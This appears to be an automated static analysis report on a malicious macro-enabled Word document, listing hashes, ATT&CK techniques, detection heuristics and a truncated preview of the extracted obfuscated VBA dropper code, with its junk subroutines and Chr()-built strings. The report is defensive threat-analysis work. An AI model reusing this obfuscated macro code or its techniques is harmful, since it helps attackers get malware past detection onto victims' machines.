Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4a5edcbe2fc3d423…

MALICIOUS

Office (OOXML)

Size: 25.2 KB
Created: 2016-09-16 15:29:00 UTC
Authoring application: Microsoft Office Word 15.0000
First seen: 2019-01-12
MD5: b0de85d0884e903b40a12022aec4a723
SHA-1: 5f7111691a9b75f4985f0e83df946ded21f8cfd9
SHA-256: 4a5edcbe2fc3d42303baae4630a7591d223e882c690a7dacb7fbd332f61a2f0d
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Macro.Valyria-6388352-1. Static analysis revealed the presence of a VBA project with a Document_Open macro and a critical Shell() call, indicating an attempt to execute arbitrary code. The VBA code is heavily obfuscated, but the presence of these indicators strongly suggests the macro is designed to download and execute a secondary payload.

Heuristics (5)

  • ClamAV: Doc.Macro.Valyria-6388352-1 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Valyria-6388352-1
  • VBA project inside OOXML [medium] (OOXML_VBA), 2 related findings
    Document contains a VBA project (VBA macros present)
  • Shell() call in VBA [critical] (OLE_VBA_SHELL)
    Shell() call in VBA
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas — in document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 — in document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships — in document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing — in document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — in document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml — in document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape — in document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 11871 bytes
SHA-256: 73c9b598c397fad341ae33fbedac71975308667fcbc6e32106ed7cd1fa7133cd
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const aNMPbQOwnjl As String = "leNzJQ"
Private Const lYOiQQGdgODv As String = "fFCRoX"
Private Const NCrwYonWwMYP As String = "plTaaN"
Private Const BBEJqAbswada As String = "rQnkKK"
Private Const mjMPDQhZYukU As String = "eXQkNY"

Dim UNUkrg As String
Dim xkzClE As Double
Dim hZYukU As Currency
Dim KklBs As Variant
Dim bswada As Integer
Dim nWwMYP As Variant
Dim nQxweP As Integer
Dim gxleDV As Variant
Dim fOHWZUiVM As String
Dim OuaJnn As Integer
Dim qdDnpL As String
Dim GdgODv As Double
Dim QOwnjl As Currency

Function BwEtwB(ByVal tkJOGI As Integer)
If tkJOGI = "MUFPxp" Then
mLygkP = "nyjdFO"
End Function

Sub iWGYtT()
Dim SMfRrk As Integer
Dim JIYmt As String
End Sub

Sub KhCbFqzZ()
msRVp = 28 + 68
End Sub
Sub nqIKtnqL()
RuHRr = 19 + 7
End Sub
Sub GUxkvuRM()
SajnW = 66 + 40
End Sub
Sub VoxpdFwR()
imTFT = 85 + 57
End Sub
Sub LOoIgpJM()
GPyTB = 89 + 65
End Sub
Sub NcCKnNlG()
KVwjW = 32 + 75
End Sub
Sub qEWMzKRF()
VEhM = 62 + 18
End Sub
Sub xSaCldVx()
dFslN = 96 + 83
End Sub
Sub OgsPlmcX()
rrHJU = 19 + 23
End Sub
Sub qyPlKkoY()
UBNsI = 13 + 4
End Sub
Sub bZPPiZZV()
nfBSJ = 26 + 57
End Sub
Sub bfXqXzCB()
odtHO = 74 + 70
End Sub
Sub wYiebEye()
sZsqv = 17 + 42
End Sub
Sub jZECoqX()
gRxcY = 89 + 49
End Sub
Sub eykJXWOu()
JuSek = 85 + 11
End Sub
Sub jTFmuqnB()
QHWUW = 21 + 19
End Sub
Sub hArTuTcI()
vqxx = 11 + 78
End Sub
Sub tFVLahml()
JnKCv = 34 + 56
End Sub
Sub wdhuVEid()
IjUxx = 85 + 73
End Sub
Sub usFIvfgY()
IqbZm = 36 + 28
End Sub


Sub Execute()
Dim fFCRoX As Double
Dim NCrwYo As String
IUWAPshqs = IUWAPshqs & Chr(45)
fOHWZUiVM = fOHWZUiVM & Chr(101)
jVNxqRgic = jVNxqRgic & Chr(86)
ynFrdCSFA = ynFrdCSFA & Chr(22)
fOHWZUiVM = fOHWZUiVM & Chr(120)
HrkkitHCu = HrkkitHCu & Chr(62)
FMQZyvidd = FMQZyvidd & Chr(97)
fOHWZUiVM = fOHWZUiVM & Chr(101)
wTjNhEOfh = wTjNhEOfh & Chr(37)
crDzbYfLa = crDzbYfLa & Chr(71)
fOHWZUiVM = fOHWZUiVM & Chr(46)
BKinyARp = BKinyARp & Chr(9)
BFKzhykQN = BFKzhykQN & Chr(49)
fOHWZUiVM = fOHWZUiVM & Chr(122)
JRFeXrvbm = JRFeXrvbm & Chr(87)
FuBGZutRA = FuBGZutRA & Chr(20)
fOHWZUiVM = fOHWZUiVM & Chr(69)
vIlhtEtgj = vIlhtEtgj & Chr(57)
MTMounJpd = MTMounJpd & Chr(95)
fOHWZUiVM = fOHWZUiVM & Chr(113)
XPbuOddYr = XPbuOddYr & Chr(38)
Vcqxtejlv = Vcqxtejlv & Chr(75)
fOHWZUiVM = fOHWZUiVM & Chr(89)
cwCPVYPKz = cwCPVYPKz & Chr(11)
JMGNerLcN = JMGNerLcN & Chr(47)
fOHWZUiVM = fOHWZUiVM & Chr(92)
yiGbjCiGb = yiGbjCiGb & Chr(82)
zfpFrBwrV = zfpFrBwrV & Chr(24)
fOHWZUiVM = fOHWZUiVM & Chr(37)
WEdNadIZu = WEdNadIZu & Chr(58)
GEznNuNPy = GEznNuNPy & Chr(100)
fOHWZUiVM = fOHWZUiVM & Chr(112)
LgcrZpPCh = LgcrZpPCh & Chr(32)
djnMqXJxv = djnMqXJxv & Chr(73)
fOHWZUiVM = fOHWZUiVM & Chr(109)
DsuwCxeDK = DsuwCxeDK & Chr(12)
RSCcajmoN = RSCcajmoN & Chr(45)
fOHWZUiVM = fOHWZUiVM & Chr(101)
YeyIQbxzm = YeyIQbxzm & Chr(83)
HmlTotXCV = HmlTotXCV & Chr(22)
fOHWZUiVM = fOHWZUiVM & Chr(116)
xAUuIDYSE = xAUuIDYSE & Chr(59)
NLwCJmoby = NLwCJmoby & Chr(97)
fOHWZUiVM = fOHWZUiVM & Chr(37)
mcTYHOevr = mcTYHOevr & Chr(34)
lpjbmPkIv = lpjbmPkIv & Chr(71)
fOHWZUiVM = fOHWZUiVM & Chr(38)
domckXtwU = domckXtwU & Chr(13)
KEpbsppOi = KEpbsppOi & Chr(50)
fOHWZUiVM = fOHWZUiVM & Chr(101)
zapoyBMsw = zapoyBMsw & Chr(84)
OthiklyOV = OthiklyOV & Chr(20)
fOHWZUiVM = fOHWZUiVM & Chr(120)
XwMbpcnLP = XwMbpcnLP & Chr(60)
VSsQFfOmy = VSsQFfOmy & Chr(95)
fOHWZUiVM = fOHWZUiVM & Chr(101)
MYLFontoC = MYLFontoC & Chr(35)
ebWZEVoiQ = ebWZEVoiQ & Chr(76)
fOHWZUiVM = fOHWZUiVM & Chr(46)
SFnZvigaJ = SFnZvigaJ & Chr(8)
SKmqpiQai = SKmqpiQai & Chr(48)
fOHWZUiVM = fOHWZUiVM & Chr(122)
aWhVfabkH = aWhVfabkH & Chr(86)
IeUhDsBoq = IeUhDsBoq & Chr(25)
fOHWZUiVM = fOHWZUiVM & Chr(69)
ytEIXCCEZ = ytEIXCCEZ & Chr(62)
PDfPYl
... (truncated)
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 34304 bytes
SHA-256: fd3e404120999d68d5777cbd23ed03ba78a437027cf2662c50839ed531b8ee5d
Detection: ClamAV: Doc.Macro.Valyria-6388352-1
Obfuscation or payload: unlikely